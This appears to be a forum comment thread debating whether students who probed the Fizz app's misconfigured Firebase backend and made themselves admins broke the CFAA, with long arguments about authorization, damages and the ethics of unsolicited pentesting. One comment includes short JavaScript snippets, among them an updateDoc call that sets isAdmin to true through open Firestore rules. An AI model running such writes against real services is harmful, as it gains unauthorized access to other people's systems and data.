I'm not a lawyer, but I am professionally interested in this weird branch of the law, and it seems like EFF's staff attorney went a bit out on a limb here:
* Fizz appears to be a client/server application (presumably a web app?)
* The testing the researchers did was of software running on Fizz's servers
* After identifying a vulnerability, the researchers created administrator accounts using the database access they obtained
* The researchers were not given permission to do this testing
If that fact pattern holds, then unless there's a California law governing this that I'm not aware of --- and even then, federal supremacy moots it, right? --- I think they did straightforwardly violate the CFAA, contra the claim in their response.
At least three things mitigate their legal risk:
1. It's very clear from their disclosure and behavior after disclosing that they were in good faith conducting security research, making them an unattractive target for prosecution.
2. It's not clear that they did any meaningful damage (this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplated retaining a forensics firm or truing things up with their insurers, who probably did not exist), meaning there wouldn't have been much to prosecute.
3. Fizz's lawyers fucked up and threatened a criminal prosecution in order to obtain a valuable concession from the researchers, which, as EFF points out, violates a state bar rule.
I think the good guys prevailed here, but I'm wary of taking too many lessons from this; if this hadn't been "Fizz", but rather the social media features of Dunder Mifflin Infinity, the outcome might have been gnarlier.
A friend points out that the limb EFF was out on was sturdy indeed, since DOJ has issued a policy statement saying they're not going after good-faith security research.
To me that reads less as "this is legal" and more as "this is illegal, but we (the executive branch of the government) will be nice and not go after you for it as long as we think you're a good guy". That's (arguably) better than nothing, but not exactly an ideal way to structure our justice system in my opinion.
Yes, but I don't see a better solution. If we make "security research" legal, then any hacker can just say "oh I was just going to disclose my findings to them".
Knowing the audience of this forum, you’re probably American and under 35. You have lived your whole life with an inoperative legislature. The US Congress, through a mixture of time-honored traditions with unfathomable externalities (there can never be more than this number of representatives) and disinterested, sports-like politics, is unable to pass new laws in a reactive fashion. This means that kludges, with their own unfathomable externalities, look like sane solutions. They’re not. A functioning democracy would set up a legal framework for ethical research.
Not really; many professional researchers notify law enforcement when engaging in something that could be viewed as illegal or could generate calls to the police.
What should happen is the addition of a "reasonable" standard, combined with existing case law and policy positions to not prosecute people who have a reasonable basis supporting their claim of security research.
Instead we'll be left with the lazy lawmakers doing nothing and the executive saying they'll prosecute only the people who "deserve" it.
Any time you see that word you can be pretty sure that the matter under consideration is a fact question for the jury. The reason you hate that word is that you prefer hard-and-fast, bright-line rules. That’s fine, I do too.
Reasonable just means there’s no good way to have a bright-line rule and we have to consider these questions one at a time, in context.
Given that most cases never go to trial, and the possibility of long prison sentences and large fines are used as threats against individuals, the idea that a jury might find it "reasonable" is small solace to someone facing multiple charges of violating the CFAA, with corresponding jail time and fines. Weev was sentenced to 3.4 years of prison time and a fine of $73,000 for the crime of downloading a sequentially numbered unprotected data set. Though the sentence was later reduced, he still went to prison for a non-zero amount of time.
The prosecutor has a vested interest in making you look like a bad person. Even if there is no evil in your heart, they will dig into your history and find some dirt, then lie and twist your words to make you into some sort of evil hacker, so that the "reasonable" people on your jury, seeing the prosecutor's version of you, are going to think you deserve prison time.
Is the inference here that the evil in weev’s heart was put there by a criminal prosecutor? That was quite a trick.
It’s a real shame that weev didn’t have someone who was in his corner who was interested in making him look completely innocent. It seems like the system is rigged!
The term "reasonable" is generally used to qualify some standard of behavior or conduct that is expected from individuals in specific situations. Because "reasonable" is inherently subjective, the responsibility for making the determination is (generally) passed over to a jury, who will weigh what the prosecution and defense have presented, which entails previous cases, the specific fact pattern of the case being deliberated, etc.
There are also situations where an actual judge makes the determination but generally, in a criminal context, it's up to a jury.
I don’t think you’re viewing it quite correctly. Reasonableness standards usually exist in order to funnel legal compulsion into a narrower range than would exist without them. It can bracket out behavior that to the average, ordinary, everyday member of that particular community would be extreme on one end or the other. You generally don’t want the law to require people to behave in extraordinarily heroic or extraordinarily cautious ways compared to how an ordinary person under similar circumstances would act. And “ordinary” here is also context-sensitive. What’s reasonable for an ordinary teenager may be extremely impulsive or foolish for an ordinary adult. Or what’s reasonable for an ordinary expert in a field may be wildly dangerous, say, for an ordinary layman.
All that said, though, reasonableness standards exist all over the law and don’t all necessarily serve the same purpose or function exactly in the same way, when you get into the weeds.
It's similar in flight rules: one cannot fly a paraglider over a "congested area". But what counts as a "congested area" is intentionally not defined in the rules, and left up to judges to decide for each case separately.
Because if the FAA tries to come up with a definition, there will always be weird, unjust corner cases. Or it would have to just ban paragliders altogether. I think the current ambiguity is the best compromise.
Judges typically consider matters of law. Usually “reasonable” is a cue that you are discussing a matter of fact, which is the province of the jury.
Sometimes you will have something called a bench trial, where it is agreed that the judge will also serve the role of the fact finder, and there will be no jury.
> Usually “reasonable” is a cue that you are discussing a matter of fact, which is the province of the jury.
And then there are motions for a JMOL (see FRCP 50), where a judge has to decide whether a “reasonable jury” could have a legally sufficient basis to find in favor of a party.
I generally hate it too. But it is better than "it's illegal, but we won't prosecute researchers". Note that "researchers" is also undefined. "Reasonable" would be one step up from the even worse status quo.
Well, the thing about making security research legal is that the law can outline what is legal and what is illegal security research, instead of leaving it in the grey area of a policy statement that may change at any time without notice, or because of a political agenda.
A well-executed law change would make it very clear where the line into illegal territory is, and would likely include industry feedback in the drafting. The downside is it could also go the other way: such changes are drafted by politicians who likely have a fairly poor grasp of the tech and the industry, and could leave the policy in worse shape until tested by the court system.
If the law were to, say, outline steps the hacker must follow and barriers they can't cross, it may actually make it harder for a hacker to say "I was just doing research."
Laws are written by legislators, not the Department of Justice. An administrative decision by the executive branch does not change that fact. Accessing a computer system without explicit authorization or "hacking" is a federal crime. If you "hack", you can be charged with a felony for doing so at the discretion of federal prosecutors. The law isn't some magical too-incomprehensible-for-mortals text requiring magicians and soothsayers to interpret _literally_ every single clause and statement for you. As an adult citizen of a country (with an IQ above room temperature), you should be able to correctly interpret statements like the above, as was done by the person to whom you replied.
So then you’d concede that all that’s left is these Fizzbuzz people are liars and are bad people, and that their product is crap and should not be used, and you don’t need to have personally used the app nor met them personally to know any of that, since it’s all clear from their extremely obnoxious, self destructive conduct, and that that’s just an opinion and not a forecast on whether or not their useless investors will get a return?
Yeah definitely. It’s just to say that the security researchers, these classmates, didn’t get lucky. Like if I were a Stanford student, and I heard about this shitty website, you know, if I were generalizing, I wouldn’t be wrong to guess it was run by obnoxious people and that the technology was a big lie.
And this website, this forum, it has a maligned love affair with the anti establishment characters, and it can’t really figure out this one because it’s dropouts v. hackers on the face of it. Most of the comments are litigating the law, by non lawyers and even when by lawyers, by people who absolutely could not predict the future of a legal decision. Why not just trust your gut? What I want to hear - what I want to be the #1 comment forever and for all time, which is just my opinion - is like, this research never needed to happen to know that Fizz or whatever is absolute trash. Do you see what I am saying?
There are a lot of 18-22 year olds pursuing entrepreneurship out of college-aged vengeance. Y Combinator funds many such founders! And here we see the double-edged sword: if you’re at Stanford touting yourself as an entrepreneurial genius with your app about antagonizing your classmates, you had better actually bring the bacon to your supposed technology. Because you have more than your founding team’s worth of classmates who hate your guts, but can actually program.
> this is subtle: you can easily rack up 5-6 figure damage numbers from unauthorized security research, but Fizz was so small and new that I'm assuming nobody even contemplated retaining a forensics firm or truing things up with their insurers, who probably did not exist
This seems like a problem with the existing law, if that's how it works.
It puts the amount of "damages" in the hands of the "victim" who can choose to spend arbitrary amounts of resources (trivial in the scope of a large bureaucracy but large in absolute amount), providing a perverse incentive to waste resources in order to vindictively trigger harsh penalties against an imperfect actor whose true transgression was to embarrass them.
And it improperly assigns the cost of such measures, even to the extent that they're legitimate, to the person who merely brought their attention to the need for them. If you've been operating a publicly available service with a serious vulnerability you still have to go through everything and evaluate the scope of the compromise regardless of whether or not this person did anything inappropriate, in case someone else did. The source of that cost was their own action in operating a vulnerable service -- they should still be incurring it even if they discovered the vulnerability themselves, but not before putting it in production.
The damages attributable to the accused should be limited to the damage they actually caused, for example by using access to obtain customer financial information and committing credit card fraud.
A forensics investigation is usually required by insurers. It's not an arbitrary amount of money, it's just an amount you're not happy with. I understand why you feel that way, but it's not the way the law works.
Services can negotiate the terms of their insurance contract or even choose whether or not to carry insurance. They agree to these terms and know the implications, and again, if the need for the investigation is legitimate then they should be conducting it regardless of how the vulnerability is uncovered.
You were talking about both but you were mistaken about the rule as well. Your focus on causation suggests you’re struggling with the idea that a second order event stemming from a breach could be compensatory damages, but of course it would fall within consequential damages if causation was found to be sufficiently attenuated.
You're just misreading the post. The "victim" doesn't calculate the damages, but a rule that makes the damages depend on actions the corporation voluntarily chooses to take allows them to vindictively maximize the penalties on someone who merely embarrassed them. Which is a perverse incentive that should be removed.
Yeah, I guess you’re right. It would be more fair to the defendant to let him specify the damages. After all, he is the only one who knows what harm he intended to inflict. Without that knowledge, how could we establish causation?
If you leave the door open to your building and some kids get in and spray paint graffiti on the walls and steal the building manager's library book, you pretty clearly have damages in the amount of the cost to clean the graffiti and the cost of the library book.
If you then go spend $50,000 to pay a contractor to sweep the building for bugs on the off chance the kids were actually Russian spies, that's on you for leaving the door open. Even if you have a legitimate fear of Russian spies.
Likewise, if the way you clean the graffiti is not to pay someone $50 to paint over it but to bring in a demolition crew to implode the whole building and then build an identical one in its place at the cost of a million dollars, this was your choosing and not the doing of the miscreants.
I presume that the "limb" the EFF attorney went out on is basically what would've been disputed in a court of law. It's easily argued that if an app is so badly configured that just _following the Firebase protocol_ can give you write access to the database, you haven't actually circumvented any security measures, because _there weren't any to circumvent_.
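As a rough sketch of what "just following the Firebase protocol" looks like in practice (this is hypothetical: the collection and field names are made up, and it assumes the standard Firebase JS SDK pointed at a project whose Firestore rules permit open writes):

    // A minimal sketch, not Fizz's actual schema or config.
    // The config below is the same public client config every legitimate
    // user of the app already has -- it is not a secret or a security measure.
    import { initializeApp } from "firebase/app";
    import { getFirestore, doc, setDoc } from "firebase/firestore";

    const app = initializeApp({
      apiKey: "<public client API key>",   // placeholder
      projectId: "<project-id>",           // placeholder
    });
    const db = getFirestore(app);

    // An ordinary write request, shaped exactly like the ones the official
    // client issues. If no security rules restrict writes, it simply succeeds.
    await setDoc(doc(db, "posts", "some-post-id"), { text: "hello" });

No exploit code or credential bypass is involved; whether the write is allowed comes down entirely to the rules the operator configured server-side.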
It reminds me of the case where AT&T had their iPad subscriber data just sitting there on an unlisted webpage. Don't remember which way it went, but I think the guy went out of his way there to get all the data he could get, which isn't the case here.
IANAL, but the law does not require you to "circumvent" anything[1].
Simply, anyone who "accesses a computer without authorization ... and thereby obtains ... information from any protected computer" is in violation of the CFAA.
If the researchers in question did not download any customer data, nor cause any "damages", I am not sure they are guilty of anything. BUT, if they had, "the victim had insufficient security measures" is not a valid defense. These researchers were not authorized to access this computer, regardless of whether they were technically able to obtain access.
Leaving your door unlocked does not give burglars permission to burgle you.
That's my understanding of the law. Even the "merge this PR without review using your administrator privileges" is potentially a crime if the company policy doesn't allow you to take that action. Basically, what the code does or intends is not a factor at all, only the potentially-implicit authorization policy controls.
If I tell you "the password on the postgres account at postgres.jrock.us is blahblah42" and you read the database, it could be argued that you're exceeding your authorized access. The reason people don't tell you their database password on Hacker News is because of countries that don't have that law, I assume.
> The reason people don't tell you their database password on Hacker News is because of countries that don't have that law, I assume.
That's silly, the reason people protect themselves is so that they are protected. Legal protection is another, different kind of protection, but I think it's a deep stretch to argue that one can remove all the technical protections and still invoke the CFAA and obtain meaningful protection from the law.
> protected computer
If you're suggesting that the CFAA itself protects the computer by definition, then you've excluded the possibility of such a thing as an "unprotected computer", which renders the extra word unnecessary. I don't think that's the intention (that all computers gain the implicit protection); I think there actually needs to be a policy or standard enforced, or ownership made clear.
In the tradition of US property law, I think you need to do the bare minimum of posting "NO TRESPASSING" signs at the border so anyone that walks by them can be said to have observed the difference between your space and the public spaces surrounding it (which they are permitted to be in, just like your private property so long as it's unprotected and they haven't been asked to leave before...)
> In the tradition of US property law, I think you need to do the bare minimum of posting "NO TRESPASSING" signs at the border
I guess the law went for an allowlist instead of a denylist this time. Plus one point on their security audit!
> protected computer
As an aside, sometimes I wonder why people make threats like "you must not link to this site without permission". It's like saying "you must not look at my house as you walk by it". You can ask, but it's Not A Thing. I worry that the language could potentially confuse a court someday. (Or that it already did.)
The term "protected computer" is defined in the CFAA itself[1].
Basically it's any computer used by a bank, the federal government, or used in interstate commerce.
This is just a quirk of the US system of government. If it doesn't fit those criteria, it's going to be up to the state to prosecute based on the state's own version of the CFAA.
This is such a horrible standard. Imagine I put up a web server and only intend myself to access it. I put no security on the pages. Is Google guilty of a CFAA violation for visiting the site?
The law is not a computer program. It sometimes relies on the ambiguity of human language, and uses human judges & juries to make reasonable decisions within that ambiguity.
I think, in your scenario, you would have a hard time convincing a jury that Google's access to your computer is unauthorized.
The same argument could be made about the security research in the article. I think the majority of potential jurors would never find someone guilty or liable for this, but there is always the risk that you are unlucky and end up with 12 who would.
They were authorized, as per the permissions that Fizz gave users of the app on Firebase. A group of users noticed that it was overly permissive and reported it to them.
> Leaving your door unlocked does not give burglars permission to burgle you.
This is more like giving your stuff away and then reporting it as theft.
It's nothing like that. Fizz did not want these people making admin accounts on their server. That's the bottom line. They failed to prevent it (forgot to lock their door), but in no way did they actively "give their stuff away". No judge would see it that way.
> That's the bottom line. They failed to prevent it (forgot to lock their door) but in no way did they actively "give their stuff away"
A better analogy is that the bank forgot to lock their front door, failed to install a security system, and failed to secure their vault.
That our laws have zero accountability for these “banks”, even after a good-faith tap on the shoulder, is the ongoing failure of information security and our legal system.
It is true that leaving your door unlocked does not give burglars permission to burgle you, but how is an open door different than a closed door?
Legally, I think it's also true that an open door looks more like an invitation to enter (and it's different from burglary to simply poke your head in the door, see if anything is wrong, and not break or take anything).
If an API is served on a public network and your client hits that API with a valid request which returns 200 (not 401) and that API is shaped like an open door, such that no "knock" or similar magic or special protection-breaking incantations were required in order to obtain "the access" ...
Then would you concede it's not actually like a burglary, but a bit more like going in through an open door to see if everyone is OK? (It sounds like that's more precisely what happened here, I'll admit I haven't read it all...)
This isn't complicated. You can be convicted of breaking & entering through an open door. At trial, your defense will have to convince a jury that a reasonable person would believe they were entitled to go through the door. If the door was to, say, a Starbucks, that defense will be compelling indeed. If it is to a private home owned by strangers, you'll be convicted.
I think that's roughly how it will play out in a CFAA case too: the case will turn on why it was you thought you were authorized to tinker with the things you tinkered with. If, as is so often encouraged on HN, your defense turns on the meanings of HTTP response codes, you'll likely be convicted. On the other hand, if you can tell a convincing story about how anybody who understands a little about how a browser works would think that they were just taking a shortcut to something the site owner wanted them to do anyways, you're much more likely to be OK.
If you create an admin account in the database, it won't much matter what position the door was in, so to speak.
The concept we're dancing around here is mens rea.
(Again: DOJ has issued a policy statement saying they're not going after cases like this Fizz thing, so this is all moot anyways.)
I don't think it's that simple. The prosecution will have to prove the intent to commit a crime. If it looks like a service that should require authorization, and the door is swinging wide open, I think there's a decent argument to be made that you can't prove a reasonable neighbor's intent wasn't to perform a welfare check, and with no criminal intent there is no crime of burglary.
If my neighbor leaves his door open (in the winter, say), and I have cause to believe that something is wrong based on that, is a jury going to convict me for going in there to check on them? It really sounds like that's what was done here.
I guess creating an admin account while I'm in there is a bit like making a key for myself while I look around. That might be over the line. But without that step, I'm not sure how you can have proved that something was even wrong...
The crime in this case is accessing software running on someone else's computer without their authorization. The "someone else" in this case vehemently objects to the access at issue. The burden of proof is on the prosecution, but their argument is compelling enough that it's the defendant who'd have to do the explaining.
No: you will not get convicted checking on your neighbor. Everybody involved in that fact pattern will believe that you at the time believed it was OK for you to peek into their house. Now change the fact pattern slightly: you're not a neighbor at all, but rather some random person walking down the street. A lot less clear, right?
Anyways that's what these cases are often about: the defendant's state of mind.
Note here that this is a Firebase app, so while it's super obvious to me that issuing an INSERT or UPDATE on a SQL database would cross a line, jiggling the JSON arguments to a Firebase API call to flip a boolean is less problematic, since that's how you test these things. The problem in the SQL case is that as soon as you're speaking SQL, you know you've game-overed the application; you stop there.
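Concretely, "jiggling the JSON arguments to flip a boolean" is something on the order of the following (a hypothetical sketch: the collection name, field name, and uid are invented, and it assumes the Firebase JS SDK; the point is that it's the same call shape the app itself uses for ordinary profile updates):

    import { getFirestore, doc, updateDoc } from "firebase/firestore";

    const db = getFirestore();  // assumes the Firebase app was already initialized
    const myUid = "<your own account's document id>";  // placeholder

    // Same API call the client already makes to update a profile field,
    // just targeting a field the server-side rules should have locked down.
    await updateDoc(doc(db, "users", myUid), { isAdmin: true });

Whether that crosses the line is exactly the state-of-mind question above, but mechanically it looks like ordinary client traffic, which is why the Firebase context muddies things in a way raw SQL wouldn't.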
> Now change the fact pattern slightly: you're not a neighbor at all, but rather some random person walking
It's times like these I regret that neighbors don't talk to each other anymore. How can we even have functioning internet if we don't have network neighborhood...
> The prosecution will have to prove the intent to commit a crime.
Friendly amendment: Generally, the prosecution must prove only the intent to take the action that's proscribed by law (and sometimes, the intent to achieve the specific outcome of the action). Proving that the actor intended to commit a crime is usually not part of the prosecution's burden. [0]
> You can be convicted of breaking & entering through an open door.
That does not appear to be the case in Massachusetts. Here are the jury instructions relevant to B&E in the nighttime, with the full link below:
> To prove the defendant guilty of this offense, the Commonwealth must prove four things beyond a reasonable doubt:
> First: That the defendant broke into someone else’s (building) (ship) (vessel) (vehicle);
> Second: That the defendant entered that (building) (ship) (vessel) (vehicle);
> ...
> To prove the first element, the Commonwealth must prove beyond a reasonable doubt that the defendant exerted physical force, however slight, and thereby removed an obstruction to gaining entry into someone else’s (building) (ship) (vessel) (vehicle). Breaking includes moving in a significant manner anything that barred the way into the (building) (ship) (vessel) (vehicle). Examples would include such things as (opening a closed door whether locked or unlocked) (opening a closed window whether locked or unlocked) (going in through an open window that is not intended for use as an entrance). _On the other hand, going through an unobstructed entrance such as an open door does not constitute a breaking._
(Italicized emphasis is mine.) Entering through an open door appears to be an entering (the second element of the crime), but not a breaking (the first element). IANAL.
> You can be convicted of breaking & entering through an open door.
This definitely must vary by state. At least in Michigan that would just be trespassing. I know, because I had some very in-depth conversations with my lawyer about whether I had committed trespassing or B&E while exploring steam tunnels underneath a university. In my case, B&E couldn't apply because the door was unlocked. I also committed no other crimes besides simple trespassing.
You're totally right. The more accurate thing to say is "you could be convicted of residential burglary by walking through an open door if the prosecution could convince a jury you did so with the intent to commit a further crime".
That sounds right. I also appreciate how much you regularly add to discussion about the CFAA. I personally think it's a horrible law, but for the most part my understanding of it matches yours. Too many people mix up what "should be" vs. "what is".
In general, I've learned that if you ever wonder whether you might be breaking the CFAA, you are in violation of the CFAA. The only time this logic has ever failed that I've seen was HiQ vs. LinkedIn.
Yes, I think your description is perfectly reasonable. You could make a convincing argument that the researchers poked their head into an open door. The fact that the law requires you to steal data or otherwise cause damages would support this idea.
I just wanted to argue against the idea that an unprotected computer is fair game for hacking. Morally and legally, it is not.
I do think you adding "if they took data" to this is a bit odd given the original post makes it very clear their defense relied on not taking data or changing anything.
Not a lawyer ofc, but I would not expect that line of reasoning to hold up in court as I wouldn't expect "the door was unlocked, your honor" to excuse trespassing.
So every URL is a trespass unless you have explicit permission?
If you say the protocol determines authorization, then the Fizz protocol granted them authorization. I don't have a clear answer here because it is messy.
It's not all or nothing. The law is literally decided on a case-by-case basis.
Going to the home page of a public website is clearly authorized access. Creating admin users for yourself on someone else's server without permission is clearly unauthorized access. Any judge or jury would agree.
That's not how CFAA works. Under CFAA if there was anything to indicate that permission is required to access the system, then that's enough even if no actual security features were implemented.
Ascii convention to emphasize text, similar to doing the same thing with asterisks. Markdown later used this syntax for italics and bold, which popularized it further.
Good analysis. I’m really confused why in the 2020s anybody thinks that unsolicited pentesting is a sane or welcome thing to do.
The OP doesn’t seem to have a “mea culpa” so I hope they learned this lesson even if the piece is more meme-worthy with a “can you believe what these guys tried to do?” tone.
While their intent seems good, they were pretty clearly breaking the law.
While what you say is true, I feel strongly that it shouldn't be. It is morally right to show that a product that is used by many fellow students and marketed as "100% secure"* is in fact very vulnerable.
If some less ethical hackers got a hold of that data, much worse things could have happened.
* that's the biggest red flag. A company saying 100% obviously has very little actual security expertise.
PS: I'm a big fan of Germany's https://www.ccc.de/en/ who have pulled many such hacks against some of the biggest tech companies.
I get into your home by bypassing (poor) security. I take pictures and make copies of anything inside. Then I publicly announce the breach and demand that you fix your security based on a deadline I made up. Then I say "trust me, bro" when I promise to never reveal the data I stole.
Nobody would find any of that moral. The analogy breaks down because your home is not a place where sensitive data of lots of people is stored. But even then if you'd do the same thing in a physical place where this would be the case, you'd simply be arrested, if not (accidentally) shot.
I do agree that these security researchers are ultimately doing a good thing, but they should not be this naive and aggressive about it.
Your analogy misses some key details. It is much less absurd if I am storing valuable items and documents for everyone in the neighborhood while publicly proclaiming my house is more secure than a bank vault. Meanwhile I can't even be fucked to lock the door when I'm away.
I'd say you checking the front door to find it unlocked, then taking a few pictures for proof is perfectly moral. In this case, I think most people would agree it is a step too far to expect you to come to me first, rather than immediately announcing to the entire neighborhood that I'm being incredibly lazy and reckless with their valuables (on top of outright lying to all of them).
> So we did what any good security researcher does: We responsibly disclosed what we found. We wrote a detailed vulnerability disclosure report. We suggested remediations. And we proactively agreed not to talk about our findings publicly before an embargo date to give them time to fix the issues. Then we sent them the report via email.
This is why the whole “I can’t believe my classmates threatened legal action” line of thinking doesn’t make sense. They weren’t acting like classmates themselves. They were acting like professionals. I imagine the embargo date wasn’t well-received.
It’s also interesting that they listed all of the steps they followed that a “good security researcher” would do. So why didn’t they start with communication first before trying to hack the system? Good security researchers do that. (Not all of the time, obviously.)
> Well, me and a few security-minded friends were drawn like moths to a flame when we heard that. Our classmates were posting quite sensitive stories on Fizz, and we wanted to make sure their information was secure.
> So one Friday night…
And this is where the “good-faith security research” line of reasoning broke down for me. Think about the wording. To my ears/eyes, those sentences above seem like a carefully crafted but still flimsy excuse. It’s like a lie that you tell yourself over and over so much that you end up believing it. It seems like the researchers just wanted to have some fun on a Friday night (like he said). (And there’s nothing wrong with that. But to characterize it as only doing “good faith security research” seems like a stretch.) I guess I’m saying that I’m just not convinced. I don’t buy it.
But I get it. Articles need to be written. Talks needs to be given.
(And yes, I do believe that Fizz didn’t need to threaten legal action.)
> So why didn’t they start with communication first before trying to hack the system? Good security researchers do that. (Not all of the time, obviously.)
I don't think that is true. I think it would be very unusual for an independent (not a pentester) security researcher to communicate anything before they have any findings.
> It seems like the researchers just wanted to have some fun on a Friday night (like he said). (And there’s nothing wrong with that. But to characterize it as only doing “good faith security research” seems like a stretch.)
I don't get it. Good faith research is fun. Most people don't get into the industry because they hate the work. I don't even understand what you are trying to imply was in their mind that would disqualify their actions from being in good faith.
It seems like you only got part of what I said, especially because you didn’t acknowledge my first paragraph that explained why they weren’t acting like classmates themselves (which was a major theme/point in the article/blog post lol. It’s in the title).
I don’t feel a need to fully address all of your comments (because the first one was just your opinion similar to my own opinion). We can each look up stats for this.
But your second comment (also an opinion as mine was) did stick out to me due to emotional/psychological/human reasons, I guess:
> Good faith research is fun.
I was speaking about intention. I’m not convinced that “research” (whether it was good or bad faith even) was the goal here.
(FYI, I know the author of the post said this was written and talked about before. All I did was form an opinion based on his summary of the events for this specific HN post. I assumed it would have all of the salient information. But if there’s something missing, please point it out.)
> especially because you didn’t acknowledge my first paragraph that explained why they weren’t acting like classmates themselves (which was a major theme/point in the article/blog post lol. It’s in the title).
Because it seemed very irrelevant to whether they were good faith researchers. I don't know if I agree - critiquing classmates' designs is a quintessential classmate activity - but regardless I don't understand how this connects to the rest of your point. Say they weren't acting as classmates. How does that change anything about whether they were acting as good faith security researchers, which is the point under contention.
> All I did was form an opinion based on his summary of the events for this specific HN post
Just because it's an opinion doesn't make you not responsible for it.
I don't know what was in these people's hearts and minds. They could be secretly evil for all I know. However, I think it's morally wrong to call someone immoral without positive evidence that they were acting wrongly or had bad intentions. Yet you seem comfortable calling them immoral basically on the sole basis that the work took place on a Friday, plus a misreading of a document that they referenced (and not even the part of the document they were referencing)? You allege they have an ulterior motive but you don't even put forth what that motive might be. Like, respectfully, I think that's kind of a shitty thing to do. These are real people and deserve to be judged based on the facts and what can be drawn from the facts.
> Because it seemed very irrelevant to whether they were good faith researchers.
It’s not irrelevant if the author mentioned “classmates” several times to justify his viewpoint/emotions about the situation.
However, I was making 2 points in my original comment. The first was a critique about the author’s viewpoint that classmates did this to him. The second was about the intention of the author related to “good faith research”. Here’s why I did this. If you re-read the beginning of the author’s conclusion, he said this:
> Now let’s take a quick step back. (1) Getting a legal threat for our good-faith security research was incredibly stressful. (2) And the fact that it came from our classmates added insult to injury.
I added the numbers in () myself but you see there are 2 distinct ideas that the author is concluding here. Get it?
> Yet you seem comfortable calling them immoral
I never called anyone immoral or even implied it. If I thought so, then I would have just said it clearly.
I literally said that I didn’t know whether “research” was the main intention. I even said something to the affect of “whether it’s good or bad faith”.
I never placed any negative judgment on anyone. I even said “and there’s nothing wrong with having fun on a Friday night”. You seem to be misreading between the lines.
It’s interesting that you’re fixated on this but you haven’t commented on any of the other comments on this post that did call Fizz’s employees immoral. Someone even literally wrote a curse word (that starts with the letter “S”) to describe them.
If you remember, the original comment that I replied to said “Devil’s advocate”. That meant that this subthread was supposed to explore a viewpoint that others weren’t commenting as much.
If you had an issue with the original person who wrote the “Devil’s advocate” comment then you should reply to them. I only said that I “sort of” get his comment. I didn’t say I agree with everything he wrote.
> I never called anyone immoral or even implied it. If I thought so, then I would have just said it clearly.
Lets quote:
"To my ears/eyes, those sentences above seem like a carefully crafted but still flimsy excuse. It’s like a lie that you tell yourself over and over so much that you end up believing it"
You called them liars. Most people consider lying to be immoral. You implied they had ulterior motives. The implication is that these motives were evil because people don't lie about good motivations.
> However, I was making 2 points in my original comment.
Yes, I know, but they are separate points that don't build on each other. I disagree with both, but I only find one of the points objectionable and was only contending one of them. What, do you think that people can only fully disagree or agree with you? That people have to disagree or agree with both points?
> It’s interesting that you’re fixated on this but you haven’t commented on any of the other comments on this post that did call Fizz’s employees immoral.
I have not commented on literally every thread on the internet. You caught me. However, just because someone called them immoral doesn't mean I find their comment objectionable.
That said, are you really trying to argue that two wrongs make a right? If you want me to concede that there exist other bad people on the internet, I'll happily agree with that.
> If you remember, the original comment that I replied to said “Devil’s advocate”. That meant that this subthread was supposed to explore a viewpoint that others weren’t commenting as much.
No, it means the original commenter doesn't necessarily agree with the view being espoused. Given you said you agree with said view, you are obviously not claiming to be playing devil's advocate. In any case, devil's advocate isn't a blank cheque to behave any way you want.
> It’s interesting that you’re fixated on this but you haven’t commented on any of the other comments on this post that did call Fizz’s employees immoral.
But I don't have an issue with their comment. While I might not 100% agree with his metaphor, I think his comment was reasonable. He did not call them liars with no evidence. He did not misleadingly imply the authors agreed that one should only do security research covered by safe harbour provisions when they didn't. Etc.
I may disagree with them being immoral, but I don't object to calling them such if backed up with a reasonable argument. I object to calling them liars (or accusing them of any other moral sin) without evidence. That's something you did that most other people haven't, which is why I am fixated on your comment and not theirs.
I think they should negotiate a security test beforehand. For their own sake, but also to get buy-in. And if a company categorically refuses, you can then publish that, or share that you worry about its lack of a track record in known security audits. That's a professional way to hold them accountable.
Breaking into a system unannounced and then stating "do what I say...OR ELSE" is neither legal nor professional. When you're surprised that this will be perceived as an attack instead of being helpful, I don't know what to say.
> When you're surprised that this will be perceived as an attack instead of being helpful, I don't know what to say.
Correct. This is why I believe they (or at least some of them) weren’t actually surprised lol.
> If you can’t tell from his wisdom, it was not Cooper’s first time dealing with legal threats.
This is a quote from the post. The author acknowledged that his fellow researcher was experienced with interacting with lawyers for exactly this kind of scenario.
> I get into your home by bypassing (poor) security. I take pictures and make copies of anything inside. Then I publicly announce the breach and demand that you fix your security based on a deadline I made up. Then I say "trust me, bro" when I promise to never reveal the data I stole.
Otoh, it sounds really different if you break into your own home.
I think part of the issue is that, with everything in the cloud, your data is no longer local (like it would have been back in the day), but you (or the customer public) still have an interest in knowing if the data is secure, an interest that is at odds with the service provider, who often has perverse incentives to not care about security.
I agree that there's friction between the greater public good and private interests.
But I don't agree with the reductive take that compromised security means companies don't care or are greedy. Companies that do care and have an army of security staff still fuck up.
The reality check is that security is incredibly complicated, expensive, very easy to do incorrectly.
If anything, us software developers should do some reflection on our software stack. It's honestly quite shit if it requires daily updates and a team of security gurus to not get it wrong.
> The reality check is that security is incredibly complicated, expensive, very easy to do incorrectly.
Indeed. Which is what I meant by perverse incentives. You can generally make more money by ignoring security or doing the bare minimum. Doing security right is expensive, and the consequences of doing it wrong are usually not that much at the end of the day (for the company anyways; the users might be screwed). All this adds up to rational actors under-investing in security. And honestly it is hard to blame them.
A security researcher checking on Firestore permissions is basically the equivalent of an electrician walking into a grocery store and noticing sparking wires dangling and taped awkwardly, and imminent fire hazards that could result in catastrophic damages to people shopping at the store.
It is absolutely the right, and IMO, the duty, of security researchers to test every website, app, product and service that they use regularly to ensure the continued safety of the general public. This is too important of a field to have a "not my problem" attitude of just ignoring egregious security vulnerabilities so they can be exploited by criminals.
> I’m really confused why in the 2020s anybody thinks that unsolicited pentesting is a sane or welcome thing to do.
I was looking for a comment like this. You couldn't pay me enough to do this sort of thing in this day and age (unless working for a DoD or 3-letter agency contractor, which would have my back covered), nevermind to do it pro bono or bona fide or whatever it is that these guys had in mind (either way, it looks like they were not paid to do it).
This sort of action might still have been sort of ok-ish in the late '00s, maybe going into 2010, 2011, but when the Russian/Chinese/North Korean/Iranian cyber threats became real (plus the whole Snowden fiasco) then related laws began to change (both in the US and in Europe) and doing this sort of stuff with no-one to back you up for real (forget the EFF) meant that the one doing it would be asking for trouble in a big way.
What about due diligence? If you're about to send and store sensitive information with a service, a service that claims to be 100% secure.... shouldn't you have the right to verify that the security is up to snuff? These researchers weren't attempting to harm anybody. What's wrong with kicking the tires?
It’s both sane and welcome. The alternative to unsolicited testing is your app getting owned and your customer data being sold and you being sued into oblivion. Unsolicited.
Your vulnerability doesn’t cease to exist because you don’t want people to look at it.
Personally I'd still probably not engage in unsolicited (still illegal by the letter of the law) pentesting with just the promise that the DoJ won't prosecute as long as they agree it was in good faith. But I agree that pinkie promise does make it a bit less risky.
